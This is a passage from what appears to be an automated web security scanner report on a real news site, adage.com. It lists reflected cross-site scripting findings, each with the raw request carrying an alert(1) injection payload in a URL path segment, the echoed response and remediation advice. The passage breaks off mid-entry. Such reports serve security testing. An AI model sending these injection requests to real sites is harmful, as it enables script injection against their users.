Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ADAGESESS=0d25b5e631b2fc5d043d5492bc297f21; HMAC=B7563EA22996A55443F2832D3B97D4FBAA83B97F; redirect=%2Farticle%2Fdigital%2Fdoubleverify-33m-funding%2F229525%2F

Response

HTTP/1.1 404 Not Found
Date: Thu, 01 Sep 2011 16:09:52 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: HMAC=8F6F83012B4EF88099112C453668F49DB3281C3B; path=/
Set-Cookie: HMAC=52AAC20049036969B668F4762CCC316107AD124F; path=/
Set-Cookie: HMAC=D43A594AAF1752EFEC1A4E7F49A6516BA0F94A52; path=/
Vary: Accept-Encoding,User-Agent
Content-Length: 49472
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
<html lang="en" xmlns:og="http://opengraphprotocol.org/schema/">
<head profile="http://a9.com/-/spec/opensearch/1.1/">
<title>Oops! - Advertising Age</title>
<meta name="robots" conten
...[SNIP]...
pc="HBX0100u";hbx.gn="ehg-crain.hitbox.com";

//CONFIGURATION VARIABLES
hbx.acct    = "DM530303F9CM83EN3";
hbx.pn        = "404.php?1292963511";//THIS IS THE UNIQUE PAGE IDENTIFIER
hbx.mlc    = "adage.com/images9e00f"-alert(1)-"2dd77db2802/bottom/menus/cmo_strategy.png"; //THIS IS THE UNIQUE PAGE LOCATION IDENTIFIER
hbx.pndef    = "title";
hbx.ctdef    = "full";

//OPTIONAL PAGE VARIABLES
//ACTION SETTINGS
hbx.fv="";
hbx.lt="none";
hbx.dlf="
...[SNIP]...

1.91. http://adage.com/images/bottom/menus/cmo_strategy.png [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adage.com
Path:   /images/bottom/menus/cmo_strategy.png

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 92490"-alert(1)-"9e6d89302a5 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/bottom92490"-alert(1)-"9e6d89302a5/menus/cmo_strategy.png?1292963511 HTTP/1.1
Host: adage.com
Proxy-Connection: keep-alive
Referer: http://adage.com/article/digital/doubleverify-33m-funding/229525/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ADAGESESS=0d25b5e631b2fc5d043d5492bc297f21; HMAC=B7563EA22996A55443F2832D3B97D4FBAA83B97F; redirect=%2Farticle%2Fdigital%2Fdoubleverify-33m-funding%2F229525%2F

Response

HTTP/1.1 404 Not Found
Date: Thu, 01 Sep 2011 16:10:20 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: HMAC=92B583B58540CFE8EE70085D0937493A33E240E8; path=/
Set-Cookie: HMAC=3C34D9D7D707DA36AB608E319C1412B9498B68C3; path=/
Set-Cookie: HMAC=D524A440B583843150F5D865B79685D93AA09C19; path=/
Vary: Accept-Encoding,User-Agent
Content-Length: 49472
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
<html lang="en" xmlns:og="http://opengraphprotocol.org/schema/">
<head profile="http://a9.com/-/spec/opensearch/1.1/">
<title>Oops! - Advertising Age</title>
<meta name="robots" conten
...[SNIP]...
0100u";hbx.gn="ehg-crain.hitbox.com";

//CONFIGURATION VARIABLES
hbx.acct    = "DM530303F9CM83EN3";
hbx.pn        = "404.php?1292963511";//THIS IS THE UNIQUE PAGE IDENTIFIER
hbx.mlc    = "adage.com/images/bottom92490"-alert(1)-"9e6d89302a5/menus/cmo_strategy.png"; //THIS IS THE UNIQUE PAGE LOCATION IDENTIFIER
hbx.pndef    = "title";
hbx.ctdef    = "full";

//OPTIONAL PAGE VARIABLES
//ACTION SETTINGS
hbx.fv="";
hbx.lt="none";
hbx.dlf="!.cms,.
...[SNIP]...

1.92. http://adage.com/images/bottom/menus/cmo_strategy.png [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adage.com
Path:   /images/bottom/menus/cmo_strategy.png

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 90b09"-alert(1)-"61f3cf5a7b0 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/bottom/menus90b09"-alert(1)-"61f3cf5a7b0/cmo_strategy.png?1292963511 HTTP/1.1
Host: adage.com
Proxy-Connection: keep-alive
Referer: http://adage.com/article/digital/doubleverify-33m-funding/229525/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ADAGESESS=0d25b5e631b2fc5d043d5492bc297f21; HMAC=B7563EA22996A55443F2832D3B97D4FBAA83B97F; redirect=%2Farticle%2Fdigital%2Fdoubleverify-33m-funding%2F229525%2F

Response

HTTP/1.1 404 Not Found
Date: Thu, 01 Sep 2011 16:10:46 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: HMAC=4F2A611755EA6D74DF483958D55CC58DC9B45486; path=/
Set-Cookie: HMAC=224857C242464731B26AF1A216DDCF2D6A6ECC45; path=/
Set-Cookie: HMAC=235B2E38DD2F1A3604F86E15C94DB54DF4C669CF; path=/
Vary: Accept-Encoding,User-Agent
Content-Length: 49472
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
<html lang="en" xmlns:og="http://opengraphprotocol.org/schema/">
<head profile="http://a9.com/-/spec/opensearch/1.1/">
<title>Oops! - Advertising Age</title>
<meta name="robots" conten
...[SNIP]...
;hbx.gn="ehg-crain.hitbox.com";

//CONFIGURATION VARIABLES
hbx.acct    = "DM530303F9CM83EN3";
hbx.pn        = "404.php?1292963511";//THIS IS THE UNIQUE PAGE IDENTIFIER
hbx.mlc    = "adage.com/images/bottom/menus90b09"-alert(1)-"61f3cf5a7b0/cmo_strategy.png"; //THIS IS THE UNIQUE PAGE LOCATION IDENTIFIER
hbx.pndef    = "title";
hbx.ctdef    = "full";

//OPTIONAL PAGE VARIABLES
//ACTION SETTINGS
hbx.fv="";
hbx.lt="none";
hbx.dlf="!.cms,.js";
h
...[SNIP]...

1.93. http://adage.com/images/bottom/menus/cmo_strategy.png [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adage.com
Path:   /images/bottom/menus/cmo_strategy.png

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f93be"-alert(1)-"85b419b749b was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/bottom/menus/cmo_strategy.pngf93be"-alert(1)-"85b419b749b?1292963511 HTTP/1.1
Host: adage.com
Proxy-Connection: keep-alive
Referer: http://adage.com/article/digital/doubleverify-33m-funding/229525/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ADAGESESS=0d25b5e631b2fc5d043d5492bc297f21; HMAC=B7563EA22996A55443F2832D3B97D4FBAA83B97F; redirect=%2Farticle%2Fdigital%2Fdoubleverify-33m-funding%2F229525%2F

Response

HTTP/1.1 404 Not Found
Date: Thu, 01 Sep 2011 16:11:42 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: HMAC=08D3D1A281195607392DB659F97E57EB3A707F3E; path=/
Set-Cookie: HMAC=559E4DAFD1F816965019FE0266E357832EDFA742; path=/
Set-Cookie: HMAC=6A1E0F8222E88FF3EC431B136C080FFEF8FB044D; path=/
Vary: Accept-Encoding,User-Agent
Content-Length: 49472
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
<html lang="en" xmlns:og="http://opengraphprotocol.org/schema/">
<head profile="http://a9.com/-/spec/opensearch/1.1/">
<title>Oops! - Advertising Age</title>
<meta name="robots" conten
...[SNIP]...
n.hitbox.com";

//CONFIGURATION VARIABLES
hbx.acct    = "DM530303F9CM83EN3";
hbx.pn        = "404.php?1292963511";//THIS IS THE UNIQUE PAGE IDENTIFIER
hbx.mlc    = "adage.com/images/bottom/menus/cmo_strategy.pngf93be"-alert(1)-"85b419b749b"; //THIS IS THE UNIQUE PAGE LOCATION IDENTIFIER
hbx.pndef    = "title";
hbx.ctdef    = "full";

//OPTIONAL PAGE VARIABLES
//ACTION SETTINGS
hbx.fv="";
hbx.lt="none";
hbx.dlf="!.cms,.js";
hbx.dft="y";
hbx.e
...[SNIP]...

1.94. http://adage.com/images/bottom/menus/datacenter.png [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adage.com
Path:   /images/bottom/menus/datacenter.png

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1b9ad"-alert(1)-"16da5250f4e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images1b9ad"-alert(1)-"16da5250f4e/bottom/menus/datacenter.png?1302560559 HTTP/1.1
Host: adage.com
Proxy-Connection: keep-alive
Referer: http://adage.com/article/digital/doubleverify-33m-funding/229525/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ADAGESESS=0d25b5e631b2fc5d043d5492bc297f21; HMAC=B7563EA22996A55443F2832D3B97D4FBAA83B97F; redirect=%2Farticle%2Fdigital%2Fdoubleverify-33m-funding%2F229525%2F

Response

HTTP/1.1 404 Not Found
Date: Thu, 01 Sep 2011 16:10:45 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: HMAC=8E932249DD6BA16EF69741997348A155E8486834; path=/
Set-Cookie: HMAC=535A756555D3A975DF1E87A7F938C5A30E9DE0CA; path=/
Set-Cookie: HMAC=255909911117FD37A38A743FC039778CC5E63BA3; path=/
Vary: Accept-Encoding,User-Agent
Content-Length: 49470
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
<html lang="en" xmlns:og="http://opengraphprotocol.org/schema/">
<head profile="http://a9.com/-/spec/opensearch/1.1/">
<title>Oops! - Advertising Age</title>
<meta name="robots" conten
...[SNIP]...
pc="HBX0100u";hbx.gn="ehg-crain.hitbox.com";

//CONFIGURATION VARIABLES
hbx.acct    = "DM530303F9CM83EN3";
hbx.pn        = "404.php?1302560559";//THIS IS THE UNIQUE PAGE IDENTIFIER
hbx.mlc    = "adage.com/images1b9ad"-alert(1)-"16da5250f4e/bottom/menus/datacenter.png"; //THIS IS THE UNIQUE PAGE LOCATION IDENTIFIER
hbx.pndef    = "title";
hbx.ctdef    = "full";

//OPTIONAL PAGE VARIABLES
//ACTION SETTINGS
hbx.fv="";
hbx.lt="none";
hbx.dlf="!.
...[SNIP]...

1.95. http://adage.com/images/bottom/menus/datacenter.png [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adage.com
Path:   /images/bottom/menus/datacenter.png

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1e969"-alert(1)-"260bf1a16d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/bottom1e969"-alert(1)-"260bf1a16d/menus/datacenter.png?1302560559 HTTP/1.1
Host: adage.com
Proxy-Connection: keep-alive
Referer: http://adage.com/article/digital/doubleverify-33m-funding/229525/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ADAGESESS=0d25b5e631b2fc5d043d5492bc297f21; HMAC=B7563EA22996A55443F2832D3B97D4FBAA83B97F; redirect=%2Farticle%2Fdigital%2Fdoubleverify-33m-funding%2F229525%2F

Response

HTTP/1.1 404 Not Found
Date: Thu, 01 Sep 2011 16:11:13 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: HMAC=83D7EC139381C9615924796AF791BD217FE6185E; path=/
Set-Cookie: HMAC=C4549C2AA0B056E578126FCC855CB69288F75728; path=/
Set-Cookie: HMAC=C211744484D3967AB7ECF3B4BA00F1E95FCB4C35; path=/
Vary: Accept-Encoding,User-Agent
Content-Length: 49469
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
<html lang="en" xmlns:og="http://opengraphprotocol.org/schema/">
<head profile="http://a9.com/-/spec/opensearch/1.1/">
<title>Oops! - Advertising Age</title>
<meta name="robots" conten
...[SNIP]...
0100u";hbx.gn="ehg-crain.hitbox.com";

//CONFIGURATION VARIABLES
hbx.acct    = "DM530303F9CM83EN3";
hbx.pn        = "404.php?1302560559";//THIS IS THE UNIQUE PAGE IDENTIFIER
hbx.mlc    = "adage.com/images/bottom1e969"-alert(1)-"260bf1a16d/menus/datacenter.png"; //THIS IS THE UNIQUE PAGE LOCATION IDENTIFIER
hbx.pndef    = "title";
hbx.ctdef    = "full";

//OPTIONAL PAGE VARIABLES
//ACTION SETTINGS
hbx.fv="";
hbx.lt="none";
hbx.dlf="!.cms,.js
...[SNIP]...

1.96. http://adage.com/images/bottom/menus/datacenter.png [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adage.com
Path:   /images/bottom/menus/datacenter.png

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e3352"-alert(1)-"c3b712d34b1 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/bottom/menuse3352"-alert(1)-"c3b712d34b1/datacenter.png?1302560559 HTTP/1.1
Host: adage.com
Proxy-Connection: keep-alive
Referer: http://adage.com/article/digital/doubleverify-33m-funding/229525/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ADAGESESS=0d25b5e631b2fc5d043d5492bc297f21; HMAC=B7563EA22996A55443F2832D3B97D4FBAA83B97F; redirect=%2Farticle%2Fdigital%2Fdoubleverify-33m-funding%2F229525%2F

Response

HTTP/1.1 404 Not Found
Date: Thu, 01 Sep 2011 16:11:36 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: HMAC=A08700AA7425029970CEC6D301A20A18E96886BB; path=/
Set-Cookie: HMAC=7EA1DF067C0D518CD05DAD61CAB595E5AB0D1531; path=/
Set-Cookie: HMAC=E23A6FC78686821C617C310E92C6C2345583527E; path=/
Vary: Accept-Encoding,User-Agent
Content-Length: 49470
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
<html lang="en" xmlns:og="http://opengraphprotocol.org/schema/">
<head profile="http://a9.com/-/spec/opensearch/1.1/">
<title>Oops! - Advertising Age</title>
<meta name="robots" conten
...[SNIP]...
;hbx.gn="ehg-crain.hitbox.com";

//CONFIGURATION VARIABLES
hbx.acct    = "DM530303F9CM83EN3";
hbx.pn        = "404.php?1302560559";//THIS IS THE UNIQUE PAGE IDENTIFIER
hbx.mlc    = "adage.com/images/bottom/menuse3352"-alert(1)-"c3b712d34b1/datacenter.png"; //THIS IS THE UNIQUE PAGE LOCATION IDENTIFIER
hbx.pndef    = "title";
hbx.ctdef    = "full";

//OPTIONAL PAGE VARIABLES
//ACTION SETTINGS
hbx.fv="";
hbx.lt="none";
hbx.dlf="!.cms,.js";
hbx
...[SNIP]...

1.97. http://adage.com/images/bottom/menus/datacenter.png [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adage.com
Path:   /images/bottom/menus/datacenter.png

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dae52"-alert(1)-"a2d3540830b was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/bottom/menus/datacenter.pngdae52"-alert(1)-"a2d3540830b?1302560559 HTTP/1.1
Host: adage.com
Proxy-Connection: keep-alive
Referer: http://adage.com/article/digital/doubleverify-33m-funding/229525/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ADAGESESS=0d25b5e631b2fc5d043d5492bc297f21; HMAC=B7563EA22996A55443F2832D3B97D4FBAA83B97F; redirect=%2Farticle%2Fdigital%2Fdoubleverify-33m-funding%2F229525%2F

Response

HTTP/1.1 404 Not Found
Date: Thu, 01 Sep 2011 16:12:07 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: HMAC=AD989EF65F79D5698E3E6E0B9B6585CE0C818823; path=/
Set-Cookie: HMAC=FD9053CBE8F8535343ED5FE421BF9CD360421B45; path=/
Set-Cookie: HMAC=B9210243489D1A35995B74FAB49F802B29DBD514; path=/
Vary: Accept-Encoding,User-Agent
Content-Length: 49470
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
<html lang="en" xmlns:og="http://opengraphprotocol.org/schema/">
<head profile="http://a9.com/-/spec/opensearch/1.1/">
<title>Oops! - Advertising Age</title>
<meta name="robots" conten
...[SNIP]...
ain.hitbox.com";

//CONFIGURATION VARIABLES
hbx.acct    = "DM530303F9CM83EN3";
hbx.pn        = "404.php?1302560559";//THIS IS THE UNIQUE PAGE IDENTIFIER
hbx.mlc    = "adage.com/images/bottom/menus/datacenter.pngdae52"-alert(1)-"a2d3540830b"; //THIS IS THE UNIQUE PAGE LOCATION IDENTIFIER
hbx.pndef    = "title";
hbx.ctdef    = "full";

//OPTIONAL PAGE VARIABLES
//ACTION SETTINGS
hbx.fv="";
hbx.lt="none";
hbx.dlf="!.cms,.js";
hbx.dft="y";
hbx.e
...[SNIP]...

1.98. http://adage.com/images/bottom/menus/digital.png [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adage.com
Path:   /images/bottom/menus/digital.png

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 253e4"-alert(1)-"8f75231b492 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images253e4"-alert(1)-"8f75231b492/bottom/menus/digital.png?1292963511 HTTP/1.1
Host: adage.com
Proxy-Connection: keep-alive
Referer: http://adage.com/article/digital/doubleverify-33m-funding/229525/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ADAGESESS=0d25b5e631b2fc5d043d5492bc297f21; HMAC=B7563EA22996A55443F2832D3B97D4FBAA83B97F; redirect=%2Farticle%2Fdigital%2Fdoubleverify-33m-funding%2F229525%2F

Response

HTTP/1.1 404 Not Found
Date: Thu, 01 Sep 2011 16:09:48 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: HMAC=909F1876301078C02F9F3E2A65D09A75380B6BA9; path=/
Set-Cookie: HMAC=2D0A490135FD6FE2932A44055BA7BA42DE91AA5C; path=/
Set-Cookie: HMAC=EF756129A066F3C5F8EDBCF1AD91E1EFB92947AF; path=/
Vary: Accept-Encoding,User-Agent
Content-Length: 49467
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
<html lang="en" xmlns:og="http://opengraphprotocol.org/schema/">
<head profile="http://a9.com/-/spec/opensearch/1.1/">
<title>Oops! - Advertising Age</title>
<meta name="robots" conten
...[SNIP]...
pc="HBX0100u";hbx.gn="ehg-crain.hitbox.com";

//CONFIGURATION VARIABLES
hbx.acct    = "DM530303F9CM83EN3";
hbx.pn        = "404.php?1292963511";//THIS IS THE UNIQUE PAGE IDENTIFIER
hbx.mlc    = "adage.com/images253e4"-alert(1)-"8f75231b492/bottom/menus/digital.png"; //THIS IS THE UNIQUE PAGE LOCATION IDENTIFIER
hbx.pndef    = "title";
hbx.ctdef    = "full";

//OPTIONAL PAGE VARIABLES
//ACTION SETTINGS
hbx.fv="";
hbx.lt="none";
hbx.dlf="!.cms
...[SNIP]...

1.99. http://adage.com/images/bottom/menus/digital.png [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adage.com
Path:   /images/bottom/menus/digital.png

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 31ca1"-alert(1)-"e9fec1e377d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/bottom31ca1"-alert(1)-"e9fec1e377d/menus/digital.png?1292963511 HTTP/1.1
Host: adage.com
Proxy-Connection: keep-alive
Referer: http://adage.com/article/digital/doubleverify-33m-funding/229525/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ADAGESESS=0d25b5e631b2fc5d043d5492bc297f21; HMAC=B7563EA22996A55443F2832D3B97D4FBAA83B97F; redirect=%2Farticle%2Fdigital%2Fdoubleverify-33m-funding%2F229525%2F

Response

HTTP/1.1 404 Not Found
Date: Thu, 01 Sep 2011 16:10:10 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: HMAC=7D79A502CAA18AE76C21497230072EC3DBD2496D; path=/
Set-Cookie: HMAC=38D7E3079ACE406C524E1FB920434C996FF74234; path=/
Set-Cookie: HMAC=CAB5C8D70E37B8B2D433A9728AB001EFB7BEA2F0; path=/
Vary: Accept-Encoding,User-Agent
Content-Length: 49467
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
<html lang="en" xmlns:og="http://opengraphprotocol.org/schema/">
<head profile="http://a9.com/-/spec/opensearch/1.1/">
<title>Oops! - Advertising Age</title>
<meta name="robots" conten
...[SNIP]...
0100u";hbx.gn="ehg-crain.hitbox.com";

//CONFIGURATION VARIABLES
hbx.acct    = "DM530303F9CM83EN3";
hbx.pn        = "404.php?1292963511";//THIS IS THE UNIQUE PAGE IDENTIFIER
hbx.mlc    = "adage.com/images/bottom31ca1"-alert(1)-"e9fec1e377d/menus/digital.png"; //THIS IS THE UNIQUE PAGE LOCATION IDENTIFIER
hbx.pndef    = "title";
hbx.ctdef    = "full";

//OPTIONAL PAGE VARIABLES
//ACTION SETTINGS
hbx.fv="";
hbx.lt="none";
hbx.dlf="!.cms,.js";

...[SNIP]...

1.100. http://adage.com/images/bottom/menus/digital.png [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adage.com
Path:   /images/bottom/menus/digital.png

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 10b9b"-alert(1)-"ea04503a836 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/bottom/menus10b9b"-alert(1)-"ea04503a836/digital.png?1292963511 HTTP/1.1
Host: adage.com
Proxy-Connection: keep-alive
Referer: http://adage.com/article/digital/doubleverify-33m-funding/229525/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ADAGESESS=0d25b5e631b2fc5d043d5492bc297f21; HMAC=B7563EA22996A55443F2832D3B97D4FBAA83B97F; redirect=%2Farticle%2Fdigital%2Fdoubleverify-33m-funding%2F229525%2F

Response

HTTP/1.1 404 Not Found
Date: Thu, 01 Sep 2011 16:10:23 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: HMAC=8B72401D9A78C00ACBEB3E5C11FE2019B32A89DB; path=/
Set-Cookie: HMAC=57E3CEF8D35AE99BF2E10074F677BA6034E30308; path=/
Set-Cookie: HMAC=D5BD1C5962F97AA8E89431093F9858ADE5812F00; path=/
Vary: Accept-Encoding,User-Agent
Content-Length: 49467
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
<html lang="en" xmlns:og="http://opengraphprotocol.org/schema/">
<head profile="http://a9.com/-/spec/opensearch/1.1/">
<title>Oops! - Advertising Age</title>
<meta name="robots" conten
...[SNIP]...
;hbx.gn="ehg-crain.hitbox.com";

//CONFIGURATION VARIABLES
hbx.acct    = "DM530303F9CM83EN3";
hbx.pn        = "404.php?1292963511";//THIS IS THE UNIQUE PAGE IDENTIFIER
hbx.mlc    = "adage.com/images/bottom/menus10b9b"-alert(1)-"ea04503a836/digital.png"; //THIS IS THE UNIQUE PAGE LOCATION IDENTIFIER
hbx.pndef    = "title";
hbx.ctdef    = "full";

//OPTIONAL PAGE VARIABLES
//ACTION SETTINGS
hbx.fv="";
hbx.lt="none";
hbx.dlf="!.cms,.js";
hbx.df
...[SNIP]...

1.101. http://adage.com/images/bottom/menus/digital.png [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adage.com
Path:   /images/bottom/menus/digital.png

Issue detail

